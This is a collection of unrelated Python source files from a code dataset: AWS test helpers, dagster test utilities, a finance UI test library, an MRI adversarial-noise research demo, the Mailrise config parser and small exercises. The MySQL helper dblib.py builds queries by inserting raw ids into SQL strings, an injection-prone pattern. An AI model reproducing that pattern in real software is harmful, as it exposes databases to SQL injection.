_get_vpc()\n\n # disassociate all subnets and subnet related resources\n self.delete_vpc_subnets(spec=spec)\n\n vpc_id = spec.get(\"vpc_id\")\n security_group_id = spec.get(\"security_group_id\", None)\n internet_gateway_id = spec.get(\"internet_gateway_id\", None)\n route_table_id = spec.get(\"route_table_id\", None)\n route_association_id = spec.get(\"route_association_id\", None)\n if security_group_id:\n vpc.conn.delete_security_group(group_id=security_group_id)\n if route_association_id:\n vpc.conn.disassociate_route_table(association_id=route_association_id)\n if route_table_id:\n vpc.conn.delete_route_table(route_table_id=route_table_id)\n if internet_gateway_id:\n vpc.conn.detach_internet_gateway(internet_gateway_id=internet_gateway_id, vpc_id=vpc_id)\n vpc.conn.delete_internet_gateway(internet_gateway_id=internet_gateway_id)\n\n # delete the vpc\n vpc.conn.delete_vpc(vpc_id=vpc_id)\n\n def all_instances_in_state(self, instances, state=\"running\"):\n for instance in instances:\n instance.update()\n # if any instance is pending return True\n if instance.state != state:\n return False\n return True\n\n def yield_until_instances_in_state(self, instances, state=\"running\", timeout=180, interval=10):\n \"\"\"\n Yield until all instances are in a specified state\n \"\"\"\n max_tries = timeout/interval\n attempt = 0\n while attempt < max_tries:\n attempt += 1\n if not self.all_instances_in_state(instances=instances, state=state):\n taskpool.doyield(seconds=interval)\n else:\n return True\n return False\n\n def ssh_command(self, host, command=\"hostname\", username=\"ec2-user\", key_pair=None):\n if not key_pair:\n key_pair = os.environ[\"AP_TEST_AWS_KEY\"]\n\n ssh = SSHClient(host=host, username=username, private_key=key_pair)\n return ssh.execute(command)\n\n def fail_on_errors(self, provision_spec):\n if provision_spec.errors:\n for error in provision_spec.errors:\n self.log(error.message, error=True)\n self.fail(\"Errors. Count: {0}\".format(len(provision_spec.errors)))\n\n def _get_ec2(self):\n aws_access_key = os.environ[\"AWS_ACCESS_KEY\"]\n aws_secret_key = os.environ[\"AWS_SECRET_KEY\"]\n return awsutils.EasyEC2(aws_access_key_id=aws_access_key,\n aws_secret_access_key=aws_secret_key, aws_region_name=\"us-east-1\")\n\n def _get_vpc(self):\n aws_access_key = os.environ[\"AWS_ACCESS_KEY\"]\n aws_secret_key = os.environ[\"AWS_SECRET_KEY\"]\n return awsutils.EasyVPC(aws_access_key_id=aws_access_key,\n aws_secret_access_key=aws_secret_key, aws_region_name=\"us-east-1\")","sub_path":"test/suites/aws/awstest.py","file_name":"awstest.py","file_ext":"py","file_size_in_byte":5052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
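yield_until_instances_in_state above is one instance of a generic poll-until-predicate pattern. A small sketch of the same idea factored out; wait_for and its parameters are illustrative, not part of the original class:

import time

def wait_for(predicate, timeout=180, interval=10, sleep=time.sleep):
    # Poll predicate() every `interval` seconds until it returns True or
    # `timeout` elapses; `sleep` is injectable so taskpool.doyield fits too.
    for _ in range(max(1, int(timeout / interval))):
        if predicate():
            return True
        sleep(interval)
    return False

# e.g. wait_for(lambda: self.all_instances_in_state(instances, 'terminated'))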
+{"seq_id":"302923481","text":"#!/usr/bin/env python\n#-*- coding:UTF-8 -*-\n#=============================================================================\n# FileName: lib.py\n# Desc: \n# Author: linxiao.jz\n# Email: jiaion21@gmail.com\n# Version: 0.1\n# LastChange: 2013-01-10 13:47:36\n# History:\n#=============================================================================\n\n\nimport MySQLdb\nimport datetime\nimport logging\nfrom django.conf import settings \nlogger = logging.getLogger('api-dblib')\n\ndbconf = settings.DATABASES.get('default')\n\nclass dbconnect(object):\n def __init__(self):\n self.conn = MySQLdb.connect(host=dbconf.get('HOST'),\n user=dbconf.get('USER'),\n passwd=dbconf.get('PASSWORD'),\n db=dbconf.get('NAME'),\n port=3306,charset='utf8',use_unicode = True)\n self.cursor = self.conn.cursor()\n def __del__(self):\n self.cursor.close()\n self.conn.close()\n def _exsql(self, sql):\n try :\n self.cursor.execute(sql)\n except MySQLdb.OperationalError:\n logger.info('Retry connect by db')\n self.__init__()\n self.cursor.execute(sql)\n return self.cursor.fetchall()\n def get_termout(self, id):\n sql = '''SELECT pub_hosts.host_termout FROM pub_hosts WHERE id = %s ;''' % id\n allPerson = self._exsql(sql)\n return allPerson\n def get_template(self, id):\n sql = '''SELECT pub_template.temp_name FROM pub_template WHERE temp_name = \"%s\" ;''' % id\n allPerson = self._exsql(sql)\n return allPerson\n\ndbconn = dbconnect()\n","sub_path":"app/api/dblib.py","file_name":"dblib.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"101671300","text":"import itertools\nimport logging\nimport os\nimport tempfile\nimport uuid\n\nfrom collections import defaultdict\nfrom contextlib import contextmanager\n\nfrom dagster import (\n DagsterInvariantViolationError,\n DependencyDefinition,\n ModeDefinition,\n PipelineDefinition,\n SolidInstance,\n check,\n execute_pipeline,\n)\nfrom dagster.core.definitions.logger import LoggerDefinition\nfrom dagster.core.execution.api import RunConfig, scoped_pipeline_context\nfrom dagster.core.execution.context_creation_pipeline import (\n _create_loggers,\n create_environment_config,\n construct_pipeline_execution_context,\n)\nfrom dagster.core.log_manager import DagsterLogManager\nfrom dagster.core.storage.intermediates_manager import InMemoryIntermediatesManager\nfrom dagster.core.storage.runs import InMemoryRunStorage\nfrom dagster.core.utility_solids import define_stub_solid\n\n\ndef create_test_pipeline_execution_context(\n loggers=None, resources=None, tags=None, run_config_loggers=None\n):\n run_id = str(uuid.uuid4())\n loggers = check.opt_dict_param(loggers, 'loggers', key_type=str, value_type=LoggerDefinition)\n mode_def = ModeDefinition(loggers=loggers)\n pipeline_def = PipelineDefinition(\n name='test_legacy_context', solids=[], mode_definitions=[mode_def]\n )\n run_config_loggers = check.opt_list_param(\n run_config_loggers, 'run_config_loggers', of_type=logging.Logger\n )\n run_config = RunConfig(run_id, tags=tags, loggers=run_config_loggers)\n environment_config = create_environment_config(\n pipeline_def, {'loggers': {key: {} for key in loggers}}\n )\n loggers = _create_loggers(environment_config, run_config, pipeline_def, mode_def)\n log_manager = DagsterLogManager(run_config.run_id, {}, loggers)\n\n return construct_pipeline_execution_context(\n run_config=run_config,\n pipeline_def=pipeline_def,\n resources=resources,\n environment_config=environment_config,\n run_storage=InMemoryRunStorage(),\n intermediates_manager=InMemoryIntermediatesManager(),\n log_manager=log_manager,\n )\n\n\ndef _unlink_swallow_errors(path):\n check.str_param(path, 'path')\n try:\n os.unlink(path)\n except: # pylint: disable=W0702\n pass\n\n\n@contextmanager\ndef get_temp_file_name():\n temp_file_name = tempfile.mkstemp()[1]\n try:\n yield temp_file_name\n finally:\n _unlink_swallow_errors(temp_file_name)\n\n\n@contextmanager\ndef get_temp_file_names(number):\n check.int_param(number, 'number')\n\n temp_file_names = list()\n for _ in itertools.repeat(None, number):\n temp_file_name = tempfile.mkstemp()[1]\n temp_file_names.append(temp_file_name)\n\n try:\n yield tuple(temp_file_names)\n finally:\n for temp_file_name in temp_file_names:\n _unlink_swallow_errors(temp_file_name)\n\n\ndef _dep_key_of(solid):\n return SolidInstance(solid.definition.name, solid.name)\n\n\ndef build_pipeline_with_input_stubs(pipeline_def, inputs):\n check.inst_param(pipeline_def, 'pipeline_def', PipelineDefinition)\n check.dict_param(inputs, 'inputs', key_type=str, value_type=dict)\n\n deps = defaultdict(dict)\n for solid_name, dep_dict in pipeline_def.dependencies.items():\n for input_name, dep in dep_dict.items():\n deps[solid_name][input_name] = dep\n\n stub_solid_defs = []\n\n for solid_name, input_dict in inputs.items():\n if not pipeline_def.has_solid_named(solid_name):\n raise DagsterInvariantViolationError(\n (\n 'You are injecting an input value for solid {solid_name} '\n 'into pipeline {pipeline_name} but that solid was not found'\n ).format(solid_name=solid_name, 
pipeline_name=pipeline_def.name)\n )\n\n solid = pipeline_def.solid_named(solid_name)\n for input_name, input_value in input_dict.items():\n stub_solid_def = define_stub_solid(\n '__stub_{solid_name}_{input_name}'.format(\n solid_name=solid_name, input_name=input_name\n ),\n input_value,\n )\n stub_solid_defs.append(stub_solid_def)\n deps[_dep_key_of(solid)][input_name] = DependencyDefinition(stub_solid_def.name)\n\n return PipelineDefinition(\n name=pipeline_def.name + '_stubbed',\n solids=pipeline_def.solid_defs + stub_solid_defs,\n mode_definitions=pipeline_def.mode_definitions,\n dependencies=deps,\n )\n\n\ndef execute_solids(pipeline_def, solid_names, inputs=None, environment_dict=None, run_config=None):\n check.inst_param(pipeline_def, 'pipeline_def', PipelineDefinition)\n check.list_param(solid_names, 'solid_names', of_type=str)\n inputs = check.opt_dict_param(inputs, 'inputs', key_type=str, value_type=dict)\n environment_dict = check.opt_dict_param(environment_dict, 'environment_dict')\n run_config = check.opt_inst_param(run_config, 'run_config', RunConfig)\n\n sub_pipeline = pipeline_def.build_sub_pipeline(solid_names)\n stubbed_pipeline = build_pipeline_with_input_stubs(sub_pipeline, inputs)\n result = execute_pipeline(stubbed_pipeline, environment_dict, run_config)\n\n return {sr.solid.name: sr for sr in result.solid_result_list}\n\n\ndef execute_solid(pipeline_def, solid_name, inputs=None, environment_dict=None, run_config=None):\n check.inst_param(pipeline_def, 'pipeline_def', PipelineDefinition)\n check.str_param(solid_name, 'solid_name')\n inputs = check.opt_dict_param(inputs, 'inputs', key_type=str)\n environment_dict = check.opt_dict_param(environment_dict, 'environment')\n run_config = check.opt_inst_param(run_config, 'run_config', RunConfig)\n\n return execute_solids(\n pipeline_def,\n [solid_name],\n {solid_name: inputs} if inputs else None,\n environment_dict,\n run_config,\n )[solid_name]\n\n\n@contextmanager\ndef yield_empty_pipeline_context(run_id=None):\n with scoped_pipeline_context(PipelineDefinition([]), {}, RunConfig(run_id=run_id)) as context:\n yield context\n","sub_path":"python_modules/dagster/dagster/utils/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
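A minimal usage sketch for execute_solid above, built only from helpers already imported in this module; define_stub_solid makes a single-output solid, and the exact shape of the returned result object depends on this dagster version:

emit = define_stub_solid('emit_three', 3)
pipeline = PipelineDefinition(name='demo', solids=[emit])

# Runs just the named solid of the pipeline and returns its solid result.
result = execute_solid(pipeline, 'emit_three')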
+{"seq_id":"176066941","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n#name = setting_beginning_currency.py\n#author = tangtao\n#time = 2016/9/14 14:06\n#Description=设置-期初-外币期初\n#eMail =tangtao@lhtangtao.com\n# code is far away from bugs with the god animal protecting\nI love animals. They taste delicious.\n┏┓ ┏┓\n┏┛┻━━━┛┻┓\n┃ ☃ ┃\n┃ ┳┛ ┗┳ ┃\n┃ ┻ ┃\n┗━┓ ┏━┛\n┃ ┗━━━┓\n┃ 神兽保佑 ┣┓\n┃ 永无BUG! ┏┛\n┗┓┓┏━┳┓┏┛\n┃┫┫ ┃┫┫\n┗┻┛ ┗┻┛\n\"\"\"\nimport sys\n\nfrom YqdzUILibrary.financial.setting.setting_beginning.all_kinds_beginning import AllBeginningPage, \\\n get_financial_all_beginning_title_column, \\\n get_financial_all_beginning_row_num, financial_all_beginning_traverse_column, \\\n input_financial_all_beginning_balances, \\\n get_financial_all_beginning_value\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n\ndef get_financial_beginning_currency_column_number(driver, is_jan, kind=u\"外币往来\"):\n \"\"\"\n 查看财务中心-设置-期初与科目-外币期初中整个期初header一共有多少列 返回列数\n :param is_jan: 是否为一月记账\n :param driver:\n :return:\n \"\"\"\n if is_jan != \"yes\":\n return AllBeginningPage(driver).get_title_column_num(kind)\n else:\n return str(int(AllBeginningPage(driver).get_title_column_num(kind)) - 2)\n\n\ndef get_financial_beginning_currency_title_column(driver, title, total_column, kind=u\"外币往来\"):\n \"\"\"\n 在财务中心-设置-期初与科目-外币期初 输入标题返回标题在第几列\n :param driver:\n :param title:\n :param total_column:\n :return:\n \"\"\"\n return get_financial_all_beginning_title_column(driver, title, total_column, kind)\n\n\ndef get_financial_beginning_currency_row_num(driver):\n \"\"\"\n 在财务中心-设置-期初与科目-外币期初中,查看总共有多少行\n :param driver:\n :param kind:\n :return:\n \"\"\"\n return get_financial_all_beginning_row_num(driver, u\"外币期初\")\n\n\ndef traverse_financial_beginning_currency_title_row(driver, info, column, total_row):\n \"\"\"\n 在财务中心-设置-期初与科目-外币期初中 在第column列中查找遍历info所在第几行\n :param driver:\n :param info:\n :param kind:\n :param column:\n :param total_row:\n :return:\n \"\"\"\n kind = u\"外币期初\"\n return financial_all_beginning_traverse_column(driver, info, kind, column, total_row)\n\n\ndef traverse_financial_beginning_currency_title_column(driver, title, total_column, kind=u'外币往来'):\n \"\"\"\n 遍历在财务中心-设置-期初与科目-外币期初 输入标题返回标题在第几列\n :param driver:\n :param title:\n :param total_column:\n :return:\n \"\"\"\n return get_financial_all_beginning_title_column(driver, title, total_column, kind)\n\n\ndef input_financial_beginning_currency_balances(driver, row, column, plus_one=\"no\", amount=\"\",jan=\"no\",kind=u\"外币往来期初\"):\n \"\"\"\n 在财务中心-设置-期初与科目设置-期初-外币期初中输入金额\n :param kind:\n :param jan:\n :param driver:\n :param row:\n :param column:\n :param plus_one:如果是yes则column默认+1 yes表示输入本币金额,no则表示输入外币金额\n :param amount:\n :return:\n \"\"\"\n column_int = int(column)\n if jan==\"no\":\n if kind == u\"外币往来期初\":\n if column_int == 5:\n column = 6\n if column_int == 6:\n column = 8\n if column_int == 7:\n column = 9\n elif kind == u\"期初外币余额\":\n if column_int == 6:\n column = 7\n if column_int == 7:\n column = 9\n else:\n column=column_int\n # print row,column\n input_financial_all_beginning_balances(driver, u\"外币期初\", row, column, plus_one, amount,kind)\n\n\ndef get_financial_beginning_currency_value(driver, row, column, plus_one,jan=\"no\",kind=u\"外币往来期初\"):\n \"\"\"\n 输出财务中心-设置-期初与科目设置-期初-数量期初中指定行列的数据\n :param jan: 建账期是否为1月\n :param plus_one: 如果输入yes则column会加一\n :param driver:\n :param row:\n :param column:\n :return:\n \"\"\"\n column_int = int(column)\n if jan==\"no\":\n if kind==u\"外币往来期初\":\n if column_int == 5:\n column =6\n if column_int 
== 6:\n column = 8\n if column_int == 7:\n column = 9\n elif kind==u\"期初外币余额\":\n if column_int == 6:\n column = 7\n if column_int == 7:\n column = 9\n else:\n column=column_int\n if plus_one == \"yes\":\n return get_financial_all_beginning_value(driver, u\"外币期初\", row, int(column) + 1)\n else:\n return get_financial_all_beginning_value(driver, u\"外币期初\", row, column)\n","sub_path":"YqdzUILibrary/financial/setting/setting_beginning/setting_beginning_currency.py","file_name":"setting_beginning_currency.py","file_ext":"py","file_size_in_byte":5043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
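The hard-coded if-chains above that remap logical columns (5→6, 6→8, 7→9, and 6→7, 7→9) per 期初 kind could be expressed as one lookup table. A hedged refactoring sketch with the same mappings; the names COLUMN_REMAP and remap_column are illustrative:

# Logical column -> real grid column, per beginning-balance kind.
COLUMN_REMAP = {
    u"外币往来期初": {5: 6, 6: 8, 7: 9},
    u"期初外币余额": {6: 7, 7: 9},
}

def remap_column(column, kind, jan="no"):
    if jan != "no":
        return int(column)  # January books use the raw column index
    return COLUMN_REMAP.get(kind, {}).get(int(column), int(column))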
+{"seq_id":"96038159","text":"\"\"\"\nThis script searches for a perturbation, which makes the network fail.\nThe result will be saved in a Runner object. Make sure you have updated the \nautomap_config.py file before running this script.\n\"\"\"\n\nimport tensorflow as tf;\nimport scipy.io;\nimport h5py\nfrom os.path import join;\nimport os;\nimport os.path;\nimport _2fc_2cnv_1dcv_L1sparse_64x64_tanhrelu_upg as arch\nimport matplotlib.image as mpimg;\nimport numpy as np;\nfrom automap_config import src_weights, src_mri_data;\nfrom automap_tools import *;\nfrom Runner import Runner;\nfrom Automap_Runner import Automap_Runner;\n\nk_mask_idx1, k_mask_idx2 = read_automap_k_space_mask();\n\ndata = scipy.io.loadmat(join(src_mri_data, 'HCP_mgh_1033_T2_128_w_symbol.mat'));\nmri_data = data['mr_images_w_symbol'];\n\nbatch_size = mri_data.shape[0];\n\n# Plot parameters\nN = 128; # out image shape\nbd = 5; # Boundary between images\nplot_dest = './plots_con';\nsplits = 'splits';\n\nif not (os.path.isdir(plot_dest)):\n os.mkdir(plot_dest);\n split_dest = join(plot_dest, splits);\n if not (os.path.isdir(split_dest)):\n os.mkdir(split_dest);\n\n# Optimization parameters\nmax_itr = 8; # Update list below. This value is not relevant here\nmax_r_norm = float('Inf');\nmax_diff_norm = float('Inf');\nla = 0.1;\nwarm_start = 'off';\nwarm_start_factor = 0.0;\nperp_start = 'rand';\nperp_start_factor = 1e-5;\nreference = 'pred';\nmomentum = 0.9;\nlearning_rate = 0.001;\nverbose=True; \n\nsess = tf.Session();\n\nraw_f, raw_df = compile_network(sess, batch_size);\n\nf = lambda x: hand_f( raw_f, x, k_mask_idx1, k_mask_idx2);\ndQ = lambda x, r, label, la: hand_dQ(raw_df, x, r, label, la, \n k_mask_idx1, k_mask_idx2); \n\nrunner = Automap_Runner(max_itr, max_r_norm, max_diff_norm, \n la=la, \n warm_start=warm_start,\n warm_start_factor=warm_start_factor,\n perp_start=perp_start,\n perp_start_factor=perp_start_factor,\n reference=reference,\n momentum=momentum,\n learning_rate= learning_rate,\n verbose=verbose,\n mask= [k_mask_idx1, k_mask_idx2]\n );\n\n# Update the number of iteration you would like to run\nmax_itr_schedule = [160, 10, 7, 6];\n\nfor i in range(len(max_itr_schedule)):\n max_itr = max_itr_schedule[i];\n runner.max_itr = max_itr;\n runner.find_adversarial_perturbation(f, dQ, mri_data);\n\nrunner_id = runner.save_runner(f);\n\nprint('Saving runner as nbr: %d' % runner_id);\nrunner1 = load_runner(runner_id);\n\nmri_data = runner1.x0[0];\nim_nbr = 5;\nbd = 5;\nN = 128;\nfor i in range(len(runner1.r)):\n rr = runner1.r[i];\n if i == 0:\n rr = np.zeros(rr.shape, dtype=rr.dtype);\n fxr = f(mri_data + rr);\n x = mri_data[im_nbr, :,:];\n r = rr[im_nbr, :,:];\n fxr = fxr[im_nbr, :,:];\n im_left = scale_to_01(abs(x+r));\n im_right = scale_to_01(fxr);\n im_out = np.ones([N, 2*N + bd]);\n im_out[:,:N] = im_left;\n im_out[:,N+bd:] = im_right;\n fname_out = join(plot_dest, \\\n 'rec_automap_runner_%d_r_idx_%d.png' % (runner_id, i));\n plt.imsave(fname_out, im_out, cmap='gray');\n fname_out_noisy = join(plot_dest, splits, \\\n 'runner_%d_r_idx_%d_noisy.png' % (runner_id, i));\n fname_out_noisy_rec = join(plot_dest, splits, \\\n 'runner_%d_r_idx_%d_noisy_rec.png' % (runner_id, i));\n plt.imsave(fname_out_noisy, im_left, cmap='gray');\n plt.imsave(fname_out_noisy_rec, im_right, 
cmap='gray');\n\nsess.close();\n","sub_path":"AUTOMAP/Demo_adversarial_noise_multi2.py","file_name":"Demo_adversarial_noise_multi2.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
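scale_to_01 above comes from automap_tools via the star import; based on how it is used before plt.imsave, it is presumably a min-max normalizer along these lines (an assumption, not the actual implementation):

import numpy as np

def scale_to_01(im):
    # Linearly rescale an image into [0, 1]; ignores the constant-image case.
    im = np.asarray(im, dtype=float)
    return (im - im.min()) / (im.max() - im.min())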
+{"seq_id":"174682484","text":"\"\"\"\nThis is the YAML configuration parser for Mailrise.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport io\nimport os\nimport typing as typ\nfrom enum import Enum\nfrom logging import Logger\nfrom string import Template\nfrom typing import NamedTuple\n\nimport apprise # type: ignore\nimport yaml\nfrom apprise.common import NotifyType # type: ignore\n\nfrom mailrise.util import parseaddrparts\n\n\nDEFAULT_ASSET = apprise.AppriseAsset(\n app_id='Mailrise',\n app_desc='Mailrise SMTP Notification Relay',\n app_url='https://mailrise.xyz',\n html_notify_map={\n NotifyType.INFO: '#2e6e99',\n NotifyType.SUCCESS: '#2e992e',\n NotifyType.WARNING: '#99972e',\n NotifyType.FAILURE: '#993a2e'\n },\n theme=None,\n default_extension='.png',\n image_url_mask='https://raw.githubusercontent.com/YoRyan/mailrise/main/'\n 'src/mailrise/asset/mailrise-{TYPE}-{XY}{EXTENSION}',\n image_url_logo='https://raw.githubusercontent.com/YoRyan/mailrise/main/'\n 'src/mailrise/asset/mailrise-logo.png',\n image_path_mask=os.path.abspath(\n os.path.join(\n os.path.dirname(__file__),\n 'asset',\n 'mailrise-{TYPE}-{XY}{EXTENSION}'\n )\n )\n)\n\n\nclass ConfigFileError(Exception):\n \"\"\"Exception raised for invalid configuration files.\n\n Attributes:\n message: The reason the configuration file is invalid.\n \"\"\"\n message: str\n\n def __init__(self, message: str) -> None:\n self.message = message\n\n\nclass TLSMode(Enum):\n \"\"\"Specifies a TLS encryption operating mode.\"\"\"\n OFF = 'no TLS'\n ONCONNECT = 'TLS on connect'\n STARTTLS = 'STARTTLS, optional'\n STARTTLSREQUIRE = 'STARTTLS, required'\n\n\nclass Key(NamedTuple):\n \"\"\"A unique identifier for a sender target.\n\n Attributes:\n user: The user portion of the recipient address.\n domain: The domain portion of the recipient address, which defaults\n to \"mailrise.xyz\".\n \"\"\"\n user: str\n domain: str = 'mailrise.xyz'\n\n def __str__(self) -> str:\n return f'{self.user}@{self.domain}'\n\n def as_configured(self) -> str:\n \"\"\"Drop the domain part of this identifier if it is 'mailrise.xyz'.\"\"\"\n return self.user if self.domain == 'mailrise.xyz' else str(self)\n\n\nclass Sender(NamedTuple):\n \"\"\"A configured target for Apprise notifications.\n\n Attributes:\n apprise: The Apprise instance.\n title_template: The template string for notification title texts.\n body_template: The template string for notification body texts.\n body_format: The content type for notifications. If None, this will be\n auto-detected from the body parts of emails.\n \"\"\"\n apprise: apprise.Apprise\n title_template: Template\n body_template: Template\n body_format: typ.Optional[apprise.NotifyFormat]\n\n\nclass MailriseConfig(NamedTuple):\n \"\"\"Configuration data for a Mailrise instance.\n\n Attributes:\n logger: The logger, which is used to record interesting events.\n listen_host: The network address to listen on.\n listen_port: The network port to listen on.\n tls_mode: The TLS encryption mode.\n tls_certfile: The path to the TLS certificate chain file.\n tls_keyfile: The path to the TLS key file.\n smtp_hostname: The advertised SMTP server hostname.\n senders: A dictionary of notification targets. 
The key is the identifier\n of the configuration, and the value is the Sender instance itself.\n \"\"\"\n logger: Logger\n listen_host: str\n listen_port: int\n tls_mode: TLSMode\n tls_certfile: typ.Optional[str]\n tls_keyfile: typ.Optional[str]\n smtp_hostname: typ.Optional[str]\n senders: dict[Key, Sender]\n\n\ndef load_config(logger: Logger, f: io.TextIOWrapper) -> MailriseConfig:\n \"\"\"Loads configuration data from a YAML file.\n\n Args:\n logger: The logger, which will be passed to the `MailriseConfig` instance.\n f: The file handle to load YAML from.\n\n Returns:\n The `MailriseConfig` instance.\n\n Raises:\n ConfigFileError: The configuration file is invalid.\n \"\"\"\n yml = yaml.safe_load(f)\n if not isinstance(yml, dict):\n raise ConfigFileError(\"root node not a mapping\")\n\n yml_listen = yml.get('listen', {})\n\n yml_tls = yml.get('tls', {})\n try:\n tls_mode = TLSMode[yml_tls.get('mode', 'off').upper()]\n except KeyError:\n raise ConfigFileError('invalid TLS operating mode')\n tls_certfile = yml_tls.get('certfile', None)\n tls_keyfile = yml_tls.get('keyfile', None)\n if tls_mode != TLSMode.OFF and not (tls_certfile and tls_keyfile):\n raise ConfigFileError(\n 'TLS enabled, but certificate and key files not specified')\n\n yml_smtp = yml.get('smtp', {})\n\n yml_configs = yml.get('configs', [])\n if not isinstance(yml_configs, dict):\n raise ConfigFileError(\"'configs' node not a mapping\")\n senders = {_parsekey(key): _load_sender(config)\n for key, config in yml_configs.items()}\n\n logger.info('Loaded configuration with %d recipient(s)', len(senders))\n return MailriseConfig(\n logger=logger,\n listen_host=yml_listen.get('host', ''),\n listen_port=yml_listen.get('port', 8025),\n tls_mode=tls_mode,\n tls_certfile=tls_certfile,\n tls_keyfile=tls_keyfile,\n smtp_hostname=yml_smtp.get('hostname', None),\n senders=senders\n )\n\n\ndef _parsekey(s: str) -> Key:\n def err():\n return ConfigFileError(f\"invalid config key '{s}'; should be a string or \"\n \"an email address without periods in the username\")\n if '@' in s:\n user, domain = parseaddrparts(s)\n if not user or not domain or '.' in user:\n raise err()\n return Key(user=user, domain=domain.lower())\n elif '.' in s:\n raise err()\n else:\n return Key(user=s)\n\n\ndef _load_sender(config: dict[str, typ.Any]) -> Sender:\n if not isinstance(config, dict):\n raise ConfigFileError(\"apprise config node not a mapping\")\n\n # Extract Mailrise-specific values.\n mr_config = config.get('mailrise', {})\n config.pop('mailrise', None)\n title_template = mr_config.get('title_template', '$subject ($from)')\n body_template = mr_config.get('body_template', '$body')\n body_format = mr_config.get('body_format', None)\n if not any(body_format == c for c in (None,\n apprise.NotifyFormat.TEXT,\n apprise.NotifyFormat.HTML,\n apprise.NotifyFormat.MARKDOWN)):\n raise ConfigFileError(f\"invalid apprise notification format: {body_format}\")\n\n aconfig = apprise.AppriseConfig(asset=DEFAULT_ASSET)\n aconfig.add_config(yaml.safe_dump(config), format='yaml')\n apobj = apprise.Apprise(aconfig)\n\n return Sender(\n apprise=apobj,\n title_template=Template(title_template),\n body_template=Template(body_template),\n body_format=body_format\n )\n","sub_path":"src/mailrise/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
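A minimal configuration accepted by load_config above, using only keys this parser reads (listen, tls is omitted so it defaults to off, configs). The urls: list follows Apprise's YAML config layout, and json://localhost is a placeholder notification URL:

import io
import logging

YAML = """
listen:
  host: 0.0.0.0
  port: 8025
configs:
  basic_assistant:
    urls:
      - json://localhost
"""

config = load_config(logging.getLogger('mailrise'), io.StringIO(YAML))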
+{"seq_id":"213648514","text":"\nfrom Graph import Graph, isomorfo\n\n\ncruzamentos = 4 # número de cruzamentos colocados\ngrafo = Graph(\"asd\")\ncl = [ grafo.add_node(\"c\"+str(i+1)) for i in range(cruzamentos)]\n\ngrafo.add_edge(cl[0],cl[1],10)\ngrafo.add_edge(cl[0],cl[2],10)\ngrafo.add_edge(cl[1],cl[2],15)\ngrafo.add_edge(cl[1],cl[3],20)\n\nsubg = grafo.sub_grafos()\nciclos = grafo.ciclos()\n\nprint(\"conexo:\",grafo.conexo(subg))\nprint(\"subgrafo:\",subg)\nprint(\"ciclos:\",ciclos)\nprint(\"arvore:\",grafo.arvore(ciclos,subg))\nkr = grafo.kruskal()\nprint(\"arvore geradora minima: \",kr.get_edges())\nsubg2=kr.sub_grafos()\nciclos2=kr.ciclos()\nprint(\"é arvore?:\",kr.arvore(ciclos2,subg2))\n","sub_path":"exercicio_arvores.py","file_name":"exercicio_arvores.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"432305632","text":"# The next 4 lines are required word-for-word in the new Django\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"Pizzeria.settings\")\n\nimport django\ndjango.setup()\n\nfrom pizzas.models import Pizza, Review\n\npizzas = Pizza.objects.all()\n\nfor pizza in pizzas:\n print(pizza.id, pizza)\n\n# If we know the ID of an object we can use the get() method to\n# examine any attributes the object has.\n\nt = Pizza.objects.get(id=1) # Pizza has ID of 1 (seen by executing the above for-loop)\nprint(t.name)\nprint(t.date_added)\n\n# We can also look at the entries related to a certain topic.\n# Since we defined topic as a foreignkey attribute in the Entry model,\n# Django can use this relationship to access the entries for any topic.\n# To get data through a foreign key relationship, you use the lowercase name\n# of the related model followed by an underscore and the word set.\n\ntoppings = t.topping_set.all() # t represents Chess cause we set it as id 1\n\nfor topping in toppings:\n print(topping)\n\nr = Review.objects.get(id=2) # Pizza has ID of 1 (seen by executing the above for-loop)\nprint(r.review)\nprint(r.date_added)","sub_path":"MyShell.py","file_name":"MyShell.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"170404478","text":"import requests\nimport time\n\ntimeout = 0.2\nfor _ in range(5):\n try:\n response = requests.get(\"https://github.com/not_found\",\n timeout=timeout)\n\n response.raise_for_status()\n break\n except requests.Timeout:\n print(\"попробуйте позже timeout:\", timeout)\n timeout *= 2\n time.sleep(timeout)\n except requests.HTTPError as err:\n print(err.response.status_code)\n raise\n # except requests.RequestException as e:\n # print(e.strerror)\n\n","sub_path":"week_3/working_with_errors/03_exceptions_in_requests.py","file_name":"03_exceptions_in_requests.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
